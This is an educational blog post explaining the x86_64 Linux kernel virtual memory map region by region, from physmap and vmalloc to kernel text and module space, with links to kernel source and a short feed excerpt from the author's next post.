<p>This time we&rsquo;ll be pivoting our attention towards the omnipresent kernel virtual address space, where all the true power resides, so let&rsquo;s get stuck into chapter 5!</p>
<p><img src="https://sam4k.com/content/images/2022/04/unlimited_power.gif" alt=""></p>
<h2 id="contents">Contents</h2>
<ul>
<li><a href="#0x05-kernel-virtual-address-space">0x05 Kernel Virtual Address Space</a>
<ul>
<li><a href="#one-mapping-to-rule-them-all">One Mapping To Rule Them All</a></li>
<li><a href="#kernel-virtual-memory-map">Kernel Virtual Memory Map</a></li>
<li><a href="#wrapping-up">Wrapping Up</a>
<ul>
<li><a href="#digging-deeper">Digging Deeper</a></li>
</ul>
</li>
</ul>
</li>
<li><a href="#next-time">Next Time!</a></li>
</ul>
<h2 id="0x05-kernel-virtual-address-space">0x05 Kernel Virtual Address Space</h2>
<p>Casting our minds back to <a href="https://sam4k.com/linternals-virtual-memory-part-1/">part 1</a>, we&rsquo;ll recall that:</p>
<ul>
<li>Each process has it&rsquo;s own, sandboxed virtual address space (VAS)</li>
<li>The VAS is vast, spanning all addressable memory</li>
<li>This VAS is split between the User VAS &amp; Kernel VAS[1]</li>
</ul>
<p>As we touched on in part 1, and more so in part 2, to even set up it&rsquo;s user VAS a process needs the kernel to carry out a series of syscalls (<code>brk()</code>, <code>mmap()</code>, <code>execve()</code>  etc.)[2].</p>
<p>This is because our userspace is running in usermode (i.e. unprivileged code execution) and only the kernel is able to carry out important, system-altering stuff (right??).</p>
<p>So if we&rsquo;re in usermode and we need the kernel to do something, like <code>mmap()</code> some memory for us, then we need to ask the kernel to do it for us and we do this via syscalls.</p>
<p>Essentially, a syscall acts as a interface between usermode and kernelmode (privileged code execution), only allowing a couple of things to cross over from usermode: the syscall number &amp; it&rsquo;s arguments.</p>
<p><img src="https://sam4k.com/content/images/2022/05/image.png" alt=""></p>
<p>This way the kernel can look up the function corresponding to the syscall number, sanitise the arguments (the userspace has no power here after all) and if everything looks good, it can carry out the privileged work, return to the syscall handler which can transition back to usermode, only allowing one thing to cross over: the result of the syscall.</p>
<p><img src="https://sam4k.com/content/images/2022/04/where_you_going.gif" alt=""></p>
<p>This is all a roundabout way of broaching the question: we understand the userspace, but when we make a syscall[3], what is it running and how does it know where to find it?</p>
<p>And THAT is where the kernel virtual address space comes in. Got there eventually, right?</p>
<hr>
<ol>
<li>The VAS is often so vast (e.g. on 64-bit systems), that rather than splitting the entire address space an upper &amp; lower portion are assigned to the kernel and user respectively, with the majority in between being non-canonical/unused addresses.</li>
<li>We touched more on syscalls back in part 1, <a href="https://sam4k.com/linternals-virtual-memory-part-1/#user-mode-kernel-mode">&ldquo;User-mode &amp; Kernel-mode&rdquo;</a></li>
<li>In the future I might dedicate a full post (or 3 lol) to the syscall interface, so if that&rsquo;s something you&rsquo;d be into, feel free to poke me on <a href="https://twitter.com/sam4k1">Twitter</a></li>
</ol>
<h3 id="one-mapping-to-rule-them-all">One Mapping To Rule Them All</h3>
<p>Okay, so I know we&rsquo;re all eager to dig around the kernel VAS, but it&rsquo;s worth noting a fairly fundamental difference here: while each process has it&rsquo;s own unique user VAS, <strong>they all share the same kernel VAS</strong>.</p>
<p>Huh? What exactly does this mean? Well, to put simply, all our processes are interacting with the same kernel, so each process&rsquo;s kernel VAS maps to the same physical memory.</p>
<p>As such, any changes within the kernel will be reflected across all processes. It&rsquo;s important to note, and we&rsquo;ll cover the why in more detail later, when we&rsquo;re in usermode we have no read/write access to this kernel virtual address space.</p>
<p>This is an extremely high-level overview of the topic and the actual details will vary based on architecture &amp; security mitigations, but for now just remember that all processes share the same kernel VAS.</p>
<h3 id="kernel-virtual-memory-map">Kernel Virtual Memory Map</h3>
<p><img src="https://sam4k.com/content/images/2022/04/andsoitbegins.gif" alt=""></p>
<p>Unfortunately things aren&rsquo;t going to be as tidy and straightforward as our tour of the user virtual address space. The contents of kernelspace varies depending on architecture and unfortunately there isn&rsquo;t easy-to-visualise introspection via <code>procfs</code>.</p>
<p>As I&rsquo;ve mentioned before in Linternals, I&rsquo;ll be focusing on <code>x86_64</code> when architecture specifics come into play. So although we don&rsquo;t have <code>procfs</code>, we do have kernel docs!</p>
<p><code>[Documentation/x86/x86_64/mm.txt](https://www.kernel.org/doc/Documentation/x86/x86_64/mm.txt)</code>, specifically, provides a <code>/proc/self/maps</code>-esque breakdown of the <code>x86_64</code> virtual memory map, including both UVAS &amp; KVAS; which is perfect for us[1]:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-gdscript3" data-lang="gdscript3"><span class="line"><span class="cl"><span class="o">========================================================================================================================</span>
</span></span><span class="line"><span class="cl">    <span class="n">Start</span> <span class="n">addr</span>    <span class="o">|</span>   <span class="n">Offset</span>   <span class="o">|</span>     <span class="n">End</span> <span class="n">addr</span>     <span class="o">|</span>  <span class="n">Size</span>   <span class="o">|</span> <span class="n">VM</span> <span class="n">area</span> <span class="n">description</span>
</span></span><span class="line"><span class="cl"><span class="o">========================================================================================================================</span>
</span></span><span class="line"><span class="cl">                  <span class="o">|</span>            <span class="o">|</span>                  <span class="o">|</span>         <span class="o">|</span>
</span></span><span class="line"><span class="cl"> <span class="mi">0000000000000000</span> <span class="o">|</span>    <span class="mi">0</span>       <span class="o">|</span> <span class="mi">00007</span><span class="n">fffffffffff</span> <span class="o">|</span>  <span class="mi">128</span> <span class="n">TB</span> <span class="o">|</span> <span class="n">user</span><span class="o">-</span><span class="n">space</span> <span class="n">virtual</span> <span class="n">memory</span><span class="p">,</span> <span class="n">different</span> <span class="n">per</span> <span class="n">mm</span>
</span></span><span class="line"><span class="cl"><span class="n">__________________</span><span class="o">|</span><span class="n">____________</span><span class="o">|</span><span class="n">__________________</span><span class="o">|</span><span class="n">_________</span><span class="o">|</span><span class="n">___________________________________________________________</span>
</span></span><span class="line"><span class="cl">                  <span class="o">|</span>            <span class="o">|</span>                  <span class="o">|</span>         <span class="o">|</span>
</span></span><span class="line"><span class="cl"> <span class="mi">0000800000000000</span> <span class="o">|</span> <span class="o">+</span><span class="mi">128</span>    <span class="n">TB</span> <span class="o">|</span> <span class="n">ffff7fffffffffff</span> <span class="o">|</span> <span class="o">~</span><span class="mi">16</span><span class="n">M</span> <span class="n">TB</span> <span class="o">|</span> <span class="o">...</span> <span class="n">huge</span><span class="p">,</span> <span class="n">almost</span> <span class="mi">64</span> <span class="n">bits</span> <span class="n">wide</span> <span class="n">hole</span> <span class="n">of</span> <span class="n">non</span><span class="o">-</span><span class="n">canonical</span>
</span></span><span class="line"><span class="cl">                  <span class="o">|</span>            <span class="o">|</span>                  <span class="o">|</span>         <span class="o">|</span>     <span class="n">virtual</span> <span class="n">memory</span> <span class="n">addresses</span> <span class="n">up</span> <span class="n">to</span> <span class="n">the</span> <span class="o">-</span><span class="mi">128</span> <span class="n">TB</span>
</span></span><span class="line"><span class="cl">                  <span class="o">|</span>            <span class="o">|</span>                  <span class="o">|</span>         <span class="o">|</span>     <span class="n">starting</span> <span class="n">offset</span> <span class="n">of</span> <span class="n">kernel</span> <span class="n">mappings</span><span class="o">.</span>
</span></span><span class="line"><span class="cl"><span class="n">__________________</span><span class="o">|</span><span class="n">____________</span><span class="o">|</span><span class="n">__________________</span><span class="o">|</span><span class="n">_________</span><span class="o">|</span><span class="n">___________________________________________________________</span>
</span></span><span class="line"><span class="cl">                                                            <span class="o">|</span>
</span></span><span class="line"><span class="cl">                                                            <span class="o">|</span> <span class="n">Kernel</span><span class="o">-</span><span class="n">space</span> <span class="n">virtual</span> <span class="n">memory</span><span class="p">,</span> <span class="n">shared</span> <span class="n">between</span> <span class="n">all</span> <span class="n">processes</span><span class="p">:</span>
</span></span><span class="line"><span class="cl"><span class="n">____________________________________________________________</span><span class="o">|</span><span class="n">___________________________________________________________</span>
</span></span><span class="line"><span class="cl">                  <span class="o">|</span>            <span class="o">|</span>                  <span class="o">|</span>         <span class="o">|</span>
</span></span><span class="line"><span class="cl"> <span class="n">ffff800000000000</span> <span class="o">|</span> <span class="o">-</span><span class="mi">128</span>    <span class="n">TB</span> <span class="o">|</span> <span class="n">ffff87ffffffffff</span> <span class="o">|</span>    <span class="mi">8</span> <span class="n">TB</span> <span class="o">|</span> <span class="o">...</span> <span class="n">guard</span> <span class="n">hole</span><span class="p">,</span> <span class="n">also</span> <span class="n">reserved</span> <span class="k">for</span> <span class="n">hypervisor</span>
</span></span><span class="line"><span class="cl"> <span class="n">ffff880000000000</span> <span class="o">|</span> <span class="o">-</span><span class="mi">120</span>    <span class="n">TB</span> <span class="o">|</span> <span class="n">ffff887fffffffff</span> <span class="o">|</span>  <span class="mf">0.5</span> <span class="n">TB</span> <span class="o">|</span> <span class="n">LDT</span> <span class="n">remap</span> <span class="k">for</span> <span class="n">PTI</span>
</span></span><span class="line"><span class="cl"> <span class="n">ffff888000000000</span> <span class="o">|</span> <span class="o">-</span><span class="mf">119.5</span>  <span class="n">TB</span> <span class="o">|</span> <span class="n">ffffc87fffffffff</span> <span class="o">|</span>   <span class="mi">64</span> <span class="n">TB</span> <span class="o">|</span> <span class="n">direct</span> <span class="n">mapping</span> <span class="n">of</span> <span class="n">all</span> <span class="n">physical</span> <span class="n">memory</span> <span class="p">(</span><span class="n">page_offset_base</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"> <span class="n">ffffc88000000000</span> <span class="o">|</span>  <span class="o">-</span><span class="mf">55.5</span>  <span class="n">TB</span> <span class="o">|</span> <span class="n">ffffc8ffffffffff</span> <span class="o">|</span>  <span class="mf">0.5</span> <span class="n">TB</span> <span class="o">|</span> <span class="o">...</span> <span class="n">unused</span> <span class="n">hole</span>
</span></span><span class="line"><span class="cl"> <span class="n">ffffc90000000000</span> <span class="o">|</span>  <span class="o">-</span><span class="mi">55</span>    <span class="n">TB</span> <span class="o">|</span> <span class="n">ffffe8ffffffffff</span> <span class="o">|</span>   <span class="mi">32</span> <span class="n">TB</span> <span class="o">|</span> <span class="n">vmalloc</span><span class="o">/</span><span class="n">ioremap</span> <span class="n">space</span> <span class="p">(</span><span class="n">vmalloc_base</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"> <span class="n">ffffe90000000000</span> <span class="o">|</span>  <span class="o">-</span><span class="mi">23</span>    <span class="n">TB</span> <span class="o">|</span> <span class="n">ffffe9ffffffffff</span> <span class="o">|</span>    <span class="mi">1</span> <span class="n">TB</span> <span class="o">|</span> <span class="o">...</span> <span class="n">unused</span> <span class="n">hole</span>
</span></span><span class="line"><span class="cl"> <span class="n">ffffea0000000000</span> <span class="o">|</span>  <span class="o">-</span><span class="mi">22</span>    <span class="n">TB</span> <span class="o">|</span> <span class="n">ffffeaffffffffff</span> <span class="o">|</span>    <span class="mi">1</span> <span class="n">TB</span> <span class="o">|</span> <span class="n">virtual</span> <span class="n">memory</span> <span class="n">map</span> <span class="p">(</span><span class="n">vmemmap_base</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"> <span class="n">ffffeb0000000000</span> <span class="o">|</span>  <span class="o">-</span><span class="mi">21</span>    <span class="n">TB</span> <span class="o">|</span> <span class="n">ffffebffffffffff</span> <span class="o">|</span>    <span class="mi">1</span> <span class="n">TB</span> <span class="o">|</span> <span class="o">...</span> <span class="n">unused</span> <span class="n">hole</span>
</span></span><span class="line"><span class="cl"> <span class="n">ffffec0000000000</span> <span class="o">|</span>  <span class="o">-</span><span class="mi">20</span>    <span class="n">TB</span> <span class="o">|</span> <span class="n">fffffbffffffffff</span> <span class="o">|</span>   <span class="mi">16</span> <span class="n">TB</span> <span class="o">|</span> <span class="n">KASAN</span> <span class="n">shadow</span> <span class="n">memory</span>
</span></span><span class="line"><span class="cl"><span class="n">__________________</span><span class="o">|</span><span class="n">____________</span><span class="o">|</span><span class="n">__________________</span><span class="o">|</span><span class="n">_________</span><span class="o">|</span><span class="n">____________________________________________________________</span>
</span></span><span class="line"><span class="cl">                                                            <span class="o">|</span>
</span></span><span class="line"><span class="cl">                                                            <span class="o">|</span> <span class="n">Identical</span> <span class="n">layout</span> <span class="n">to</span> <span class="n">the</span> <span class="mi">56</span><span class="o">-</span><span class="n">bit</span> <span class="n">one</span> <span class="n">from</span> <span class="n">here</span> <span class="n">on</span><span class="p">:</span>
</span></span><span class="line"><span class="cl"><span class="n">____________________________________________________________</span><span class="o">|</span><span class="n">____________________________________________________________</span>
</span></span><span class="line"><span class="cl">                  <span class="o">|</span>            <span class="o">|</span>                  <span class="o">|</span>         <span class="o">|</span>
</span></span><span class="line"><span class="cl"> <span class="n">fffffc0000000000</span> <span class="o">|</span>   <span class="o">-</span><span class="mi">4</span>    <span class="n">TB</span> <span class="o">|</span> <span class="n">fffffdffffffffff</span> <span class="o">|</span>    <span class="mi">2</span> <span class="n">TB</span> <span class="o">|</span> <span class="o">...</span> <span class="n">unused</span> <span class="n">hole</span>
</span></span><span class="line"><span class="cl">                  <span class="o">|</span>            <span class="o">|</span>                  <span class="o">|</span>         <span class="o">|</span> <span class="n">vaddr_end</span> <span class="k">for</span> <span class="n">KASLR</span>
</span></span><span class="line"><span class="cl"> <span class="n">fffffe0000000000</span> <span class="o">|</span>   <span class="o">-</span><span class="mi">2</span>    <span class="n">TB</span> <span class="o">|</span> <span class="n">fffffe7fffffffff</span> <span class="o">|</span>  <span class="mf">0.5</span> <span class="n">TB</span> <span class="o">|</span> <span class="n">cpu_entry_area</span> <span class="n">mapping</span>
</span></span><span class="line"><span class="cl"> <span class="n">fffffe8000000000</span> <span class="o">|</span>   <span class="o">-</span><span class="mf">1.5</span>  <span class="n">TB</span> <span class="o">|</span> <span class="n">fffffeffffffffff</span> <span class="o">|</span>  <span class="mf">0.5</span> <span class="n">TB</span> <span class="o">|</span> <span class="o">...</span> <span class="n">unused</span> <span class="n">hole</span>
</span></span><span class="line"><span class="cl"> <span class="n">ffffff0000000000</span> <span class="o">|</span>   <span class="o">-</span><span class="mi">1</span>    <span class="n">TB</span> <span class="o">|</span> <span class="n">ffffff7fffffffff</span> <span class="o">|</span>  <span class="mf">0.5</span> <span class="n">TB</span> <span class="o">|</span> <span class="o">%</span><span class="n">esp</span> <span class="n">fixup</span> <span class="n">stacks</span>
</span></span><span class="line"><span class="cl"> <span class="n">ffffff8000000000</span> <span class="o">|</span> <span class="o">-</span><span class="mi">512</span>    <span class="n">GB</span> <span class="o">|</span> <span class="n">ffffffeeffffffff</span> <span class="o">|</span>  <span class="mi">444</span> <span class="n">GB</span> <span class="o">|</span> <span class="o">...</span> <span class="n">unused</span> <span class="n">hole</span>
</span></span><span class="line"><span class="cl"> <span class="n">ffffffef00000000</span> <span class="o">|</span>  <span class="o">-</span><span class="mi">68</span>    <span class="n">GB</span> <span class="o">|</span> <span class="n">fffffffeffffffff</span> <span class="o">|</span>   <span class="mi">64</span> <span class="n">GB</span> <span class="o">|</span> <span class="n">EFI</span> <span class="n">region</span> <span class="n">mapping</span> <span class="n">space</span>
</span></span><span class="line"><span class="cl"> <span class="n">ffffffff00000000</span> <span class="o">|</span>   <span class="o">-</span><span class="mi">4</span>    <span class="n">GB</span> <span class="o">|</span> <span class="n">ffffffff7fffffff</span> <span class="o">|</span>    <span class="mi">2</span> <span class="n">GB</span> <span class="o">|</span> <span class="o">...</span> <span class="n">unused</span> <span class="n">hole</span>
</span></span><span class="line"><span class="cl"> <span class="n">ffffffff80000000</span> <span class="o">|</span>   <span class="o">-</span><span class="mi">2</span>    <span class="n">GB</span> <span class="o">|</span> <span class="n">ffffffff9fffffff</span> <span class="o">|</span>  <span class="mi">512</span> <span class="n">MB</span> <span class="o">|</span> <span class="n">kernel</span> <span class="n">text</span> <span class="n">mapping</span><span class="p">,</span> <span class="n">mapped</span> <span class="n">to</span> <span class="n">physical</span> <span class="n">address</span> <span class="mi">0</span>
</span></span><span class="line"><span class="cl"> <span class="n">ffffffff80000000</span> <span class="o">|-</span><span class="mi">2048</span>    <span class="n">MB</span> <span class="o">|</span>                  <span class="o">|</span>         <span class="o">|</span>
</span></span><span class="line"><span class="cl"> <span class="n">ffffffffa0000000</span> <span class="o">|-</span><span class="mi">1536</span>    <span class="n">MB</span> <span class="o">|</span> <span class="n">fffffffffeffffff</span> <span class="o">|</span> <span class="mi">1520</span> <span class="n">MB</span> <span class="o">|</span> <span class="n">module</span> <span class="n">mapping</span> <span class="n">space</span>
</span></span><span class="line"><span class="cl"> <span class="n">ffffffffff000000</span> <span class="o">|</span>  <span class="o">-</span><span class="mi">16</span>    <span class="n">MB</span> <span class="o">|</span>                  <span class="o">|</span>         <span class="o">|</span>
</span></span><span class="line"><span class="cl">    <span class="n">FIXADDR_START</span> <span class="o">|</span> <span class="o">~-</span><span class="mi">11</span>    <span class="n">MB</span> <span class="o">|</span> <span class="n">ffffffffff5fffff</span> <span class="o">|</span> <span class="o">~</span><span class="mf">0.5</span> <span class="n">MB</span> <span class="o">|</span> <span class="n">kernel</span><span class="o">-</span><span class="n">internal</span> <span class="n">fixmap</span> <span class="nb">range</span><span class="p">,</span> <span class="n">variable</span> <span class="n">size</span> <span class="ow">and</span> <span class="n">offset</span>
</span></span><span class="line"><span class="cl"> <span class="n">ffffffffff600000</span> <span class="o">|</span>  <span class="o">-</span><span class="mi">10</span>    <span class="n">MB</span> <span class="o">|</span> <span class="n">ffffffffff600fff</span> <span class="o">|</span>    <span class="mi">4</span> <span class="n">kB</span> <span class="o">|</span> <span class="n">legacy</span> <span class="n">vsyscall</span> <span class="n">ABI</span>
</span></span><span class="line"><span class="cl"> <span class="n">ffffffffffe00000</span> <span class="o">|</span>   <span class="o">-</span><span class="mi">2</span>    <span class="n">MB</span> <span class="o">|</span> <span class="n">ffffffffffffffff</span> <span class="o">|</span>    <span class="mi">2</span> <span class="n">MB</span> <span class="o">|</span> <span class="o">...</span> <span class="n">unused</span> <span class="n">hole</span>
</span></span><span class="line"><span class="cl"><span class="n">__________________</span><span class="o">|</span><span class="n">____________</span><span class="o">|</span><span class="n">__________________</span><span class="o">|</span><span class="n">_________</span><span class="o">|</span><span class="n">___________________________________________________________</span>
</span></span></code></pre></div><p><strong>Line 5</strong>: We&rsquo;ve touched on this previously, the lower portion of our virtual addresses space[2] makes up the userspace. Size varies per architecture.</p>
<p><strong>Line 8</strong>: Remember how the virtual address spans every possible address, which is A LOT? As a result, the majority of this is non-canonical, unused space.</p>
<p><strong>Line 16</strong>: My understanding is the guard hole initially existed to prevent accidental accesses to the non-canonical region (which would cause trouble), nowadays the space is also used to load hypervisors into.</p>
<p><strong>Line 17</strong>: This will make more sense after we cover virtual memory implementation, but the per-process Local Descriptor Table describes private memory descriptor segments<a href="https://en-academic.com/dic.nsf/enwiki/1553430">[3]</a>.</p>
<p>When Page Table Isolation (a mitigation, see below) is enabled, the LDT is mapped to this kernelspace region to mitigate the contents being accessed by attackers.</p>
<p><strong>Line 18</strong>: Defined by <code>__PAGE_OFFSET_BASE</code>, the &ldquo;physmap&rdquo; (aka lowmem) can be seen as the start of the kernelspace proper. It is used as a 1:1 mapping of physical memory.</p>
<p>To recap, virtual addresses can be mapped to somewhere in physical memory. E.g. if we load a library into our virtual address space, the virtual address it&rsquo;s been mapped to actual points to some physical memory where that&rsquo;s been loaded to.</p>
<p>In another process, with it&rsquo;s own virtual address space, that same virtual address may be mapped to a completely different physical memory address.</p>
<p>Unlike typical virtual addresses (we&rsquo;ll touch on how they&rsquo;re translated), addresses in the physmap region are called kernel logical addresses. Any given kernel logical address is a fixed offset (<code>[PAGE_OFFSET](https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/page_types.h#L36)</code>) from the corresponding physical address.</p>
<p>E.g. <code>PAGE_OFFSET == physical address 0x00</code>, <code>PAGE_OFFSET+0x01 == physical address 0x01</code> etc. etc.</p>
<p><img src="https://sam4k.com/content/images/2022/05/confused_larry.gif" alt=""></p>
<p><strong>Line 19</strong>: Not much more to say about these, other than it&rsquo;s an unused region!</p>
<p><strong>Line 20</strong><a href="https://www.oreilly.com/library/view/linux-device-drivers/0596000081/ch07s04.html">[4]</a>: Defined by <code>VMALLOC_START</code> and <code>VMALLOC_END</code>, this virtual memory region is reserved for non-contiguous physical memory allocations via the <code>[vmalloc()](https://elixir.bootlin.com/linux/v5.17.5/source/include/linux/vmalloc.h#L146)</code> family of kernel functions (aka highmem region).</p>
<p>This is similar to how we initially understood virtual memory, where two contiguous virtual addresses in the <code>vmalloc</code> region may not necessarily map to two contiguous physical memory addresses (unlike physmap which we just covered).  </p>
<p>This region is also used by <code>[ioremap()](https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/io.h#L207)</code>, which doesn&rsquo;t actually allocate physical memory like <code>vmalloc()</code> but instead allows you to map a specified physical address range. E.g. allocating virtual memory to map I/O stuff for your GPU.</p>
<p>To oversimplify, though we&rsquo;ll expand on later, as this region isn&rsquo;t simply <code>physical address = logical address - PAGE_OFFSET</code>, there&rsquo;s more overhead behind the scenes using <code>vmalloc()</code> which uses virtual addressing than say <code>kmalloc()</code>, which returns addresses from the physmap region.</p>
<p><strong>Line 21</strong>: Another unused memory region!</p>
<p><strong>Line 22</strong><a href="https://blogs.oracle.com/linux/post/minimizing-struct-page-overhead">[5]</a>: Defined by <code>[VMEMMAP_START](https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/pgtable_64_types.h#L135)</code>, this region is used by the <code>[SPARSEMEM](https://www.kernel.org/doc/html/latest/vm/memory-model.html)</code> memory model in Linux to map the <code>vmemmap</code>. This is a global array, in virtual memory, that indexes all the chunks (pages) of memory currently tracked by the kernel.</p>
<p><strong>Line 23</strong>: Aaand another unused memory region!</p>
<p><strong>Line 24</strong><a href="https://www.kernel.org/doc/html/latest/dev-tools/kasan.html">[6]</a>: The Kernel Address Sanitiser (KASAN) is a dynamic memory error detector, used for finding use-after-free and out-of-bounds bugs. When enabled, <code>CONFIG_KASAN=y</code>, this region is used as shadow memory by KASAN.</p>
<p>This basically means KASAN uses this shadow memory to track memory state, which it can then compare later on with the original memory to make sure there&rsquo;s no shenanigans or undefined behaviour going on.</p>
<p><strong>Line 30</strong>: You get the idea, unused.</p>
<p><strong>Line 31</strong>: Straight from the comments, defined by <code>[CPU_ENTRY_AREA_BASE](https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/pgtable_64_types.h#L157)</code>, &ldquo;<em>cpu_entry_area is a percpu region that contains things needed by the CPU and early entry/exit code&rdquo;<a href="https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/cpu_entry_area.h#L90">[7]</a>.</em> The <code>[struct cpu_entry_area](https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/cpu_entry_area.h#L90)</code> can share more insights on its role.</p>
<p><code>CPU_ENTRY_AREA_BASE</code> is also used by <code>[vaddr_end](https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/mm/kaslr.c#L41)</code>, which along with <code>vaddr_start</code> marks the virtual address range for Kernel Address Space Layout Randomization (KASLR).</p>
<p><strong>Line 32</strong>: Yep, unused region.</p>
<p><img src="https://sam4k.com/content/images/2022/05/theresmore.gif" alt=""></p>
<p><strong>Line 33</strong>: Enabled with <code>CONFIG_X86_ESPFIX64=y</code>, this region is used to, and I honestly don&rsquo;t blame you if this makes no sense yet, fix issues with returning from kernelspace to userspace when using a 16-bit stack&hellip;</p>
<p>Again, the comments can be insightful here, so feel free to take a gander at the implementation in <code>[arch/x86/kernel/espfix_64.c](https://elixir.bootlin.com/linux/latest/source/arch/x86/kernel/espfix_64.c)</code>.</p>
<p><strong>Line 34</strong>: Another unused region.</p>
<p><strong>Line 35</strong>: Defined by <code>[EFI_VA_START](https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/pgtable_64_types.h#L159)</code>, this region unsurprinsgly is used for EFI related stuff. This is the same Extensible Firmware Interface we touch on in the (currently unfinished, oops) Linternals series on <a href="https://sam4k.com/linternals-the-modern-boot-process-part-1/">The (Modern) Boot Process</a>.</p>
<p><strong>Line 36</strong>: More unused memory.</p>
<p><strong>Line 37</strong>: This region is used as a 1:1 mapping of the kernel&rsquo;s text section, defined by <code>[__START_KERNEL_map](https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/page_64_types.h#L50)</code>. As we mentioned before, the kernel image is formatted like any other ELF, so has the same sections.</p>
<p>This is where we find all the functions in your kernel image, which is handy for debugging! In this instance, if we&rsquo;re debugging an <code>x86_64</code> target we can get a rough idea of what we&rsquo;re looking atjust from the address.</p>
<p>If we see the <code>0xffffffff8.......</code> then we know we&rsquo;re looking at the text section!</p>
<p><strong>Line 38</strong>: Any dynamically loaded  (think <code>insmod</code>) modules are mapped into this region, which sits just other the kernel text mapping as we can see in the <a href="https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/pgtable_64_types.h#L144">definition</a>:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="cp">#define MODULES_VADDR (__START_KERNEL_map + KERNEL_IMAGE_SIZE)
</span></span></span></code></pre></div><p><strong>Line 39</strong>: Defined by <code>[FIXADDR_START](https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/fixmap.h#L151)</code>, this region is used for &ldquo;fix-mapped&rdquo; addresses. These are special virtual addresses which are set/used at compile-time, but are mapped to physical physical memory at boot.</p>
<p>The <code>[fix_to_virt()](https://elixir.bootlin.com/linux/v5.17.6/source/include/asm-generic/fixmap.h#L30)</code> family of functions are used to work with these special addresses.</p>
<p><strong>Line 40</strong>: We actually snuck this in to our last part! To recap, this region is:</p>
<blockquote>
<p>a legacy mapping that actually provided an executable mapping of kernel code for specific syscalls that didn&rsquo;t require elevated privileges and hence the whole user  -&gt; kernel mode context switch. Suffice to say it&rsquo;s defunct now, and calls to vsyscall table still work for compatibility, but now actually trap and act as a normal syscall</p>
</blockquote>
<p><strong>Line 41</strong>: Our final unused memory region!</p>
<hr>
<ol>
<li>The eagle-eyed will note there&rsquo;s a couple of diagrams in <a href="https://www.kernel.org/doc/Documentation/x86/x86_64/mm.txt">mm.txt</a>, one for 4-level page tables and one for 5-level. We&rsquo;ll touch on what this means in the next section, for now just know that 4-level is more common atm</li>
<li>Specifically, depending on the arch, the most significant N bits are always 0 for userspace and 1 for kernelspace; on <code>x86_64</code> this is bits <code>48-63</code>. This leaves 248 bits of addressing for both userspace and kernelspace (128TB)</li>
<li><a href="https://en-academic.com/dic.nsf/enwiki/1553430">https://en-academic.com/dic.nsf/enwiki/1553430</a></li>
<li><a href="https://www.oreilly.com/library/view/linux-device-drivers/0596000081/ch07s04.html">https://www.oreilly.com/library/view/linux-device-drivers/0596000081/ch07s04.html</a></li>
<li><a href="https://blogs.oracle.com/linux/post/minimizing-struct-page-overhead">https://blogs.oracle.com/linux/post/minimizing-struct-page-overhead</a></li>
<li><a href="https://www.kernel.org/doc/html/latest/dev-tools/kasan.html">https://www.kernel.org/doc/html/latest/dev-tools/kasan.html</a></li>
<li><a href="https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/cpu_entry_area.h#L90">https://elixir.bootlin.com/linux/v5.17.5/source/arch/x86/include/asm/cpu_entry_area.h#L90</a></li>
</ol>
<h3 id="wrapping-up">Wrapping Up</h3>
<p><img src="https://sam4k.com/content/images/2022/05/thatstheend.gif" alt=""></p>
<p>We did it! We&rsquo;ve covered all the regions described in the kernel x86_64 4-page (we&rsquo;ll get on that in the next section) virtual memory map!</p>
<p>Hopefully there was enough detail here to provide some interesting context, but not so much that you might have well been reading the source. For the more curious, we&rsquo;ll be focusing more on implementation details in the next part.</p>
<h4 id="digging-deeper">Digging Deeper</h4>
<p>If you&rsquo;re interested in exploring some of these concepts yourself, don&rsquo;t be scared away by the source! Diving into some of the <code>#define</code>&rsquo;s and symbols we&rsquo;ve mentioned so far and rooting around can be a good way to dive in. <a href="https://elixir.bootlin.com/linux/latest/source">bootlin&rsquo;s Elixr Cross Referencer</a> is easy to use and you can jump about the source in your browser.</p>
<p>Additionally, playing around with <a href="https://github.com/osandov/drgn">drgn</a> (live kernel introspection), <a href="https://www.sourceware.org/gdb/">gdb</a> (we covered getting setup in <a href="https://sam4k.com/patching-instrumenting-debugging-linux-kernel-modules/">this post</a>) and coding is a fun way to get stuck in and explore these memory topics.</p>
<h2 id="next-time">Next Time!</h2>
<p>After 3 parts, we&rsquo;ve laid a solid foundation for our understanding of what virtual memory is and the role it plays in Linux; both in the userspace and kernelspace.</p>
<p>Armed with this knowledge, we&rsquo;re in a prime position to begin digging a little deeper and getting into some real Linternals as we take a look at how things are actually implemented.</p>
<p>Next time we&rsquo;ll begin to take a look, at both a operating system and hardware level, how this all works. I&rsquo;m not going to pretend I know how many parts that&rsquo;ll take!</p>
<p>Down the line I would also like to close this topic by bringing everything we&rsquo;ve learnt together by covering some exploitation techniques and mitigations RE virtual memory.</p>
<p>Thanks for reading!</p>
<p>exit(0);</p>
]]></content:encoded></item><item><title>Patching, Instrumenting &amp; Debugging Linux Kernel Modules</title><description>An introductory look into patching, instrumenting and debugging Linux kernel modules.</description><link>https://sam4k.com/patching-instrumenting-debugging-linux-kernel-modules/</link><guid isPermaLink="false">61faeaa97742d008b38dcee4</guid><category>linux</category><category>kernel</category><category>tooling</category><dc:creator>sam4k</dc:creator><pubDate>Fri, 15 Apr 2022 16:13:50 +0000</pubDate><media:content url="https://sam4k.com/content/images/2022/02/computer.gif" medium="image"/><content:encoded><![CDATA[<p>So not long ago I found myself having to test a fix in a Linux networking module as part of the coordinated vulnerability disclosure <a href="https://sam4k.com/a-dummys-guide-to-disclosing-linux-kernel-vulnerabilities/">I posted about</a> recently.</p>
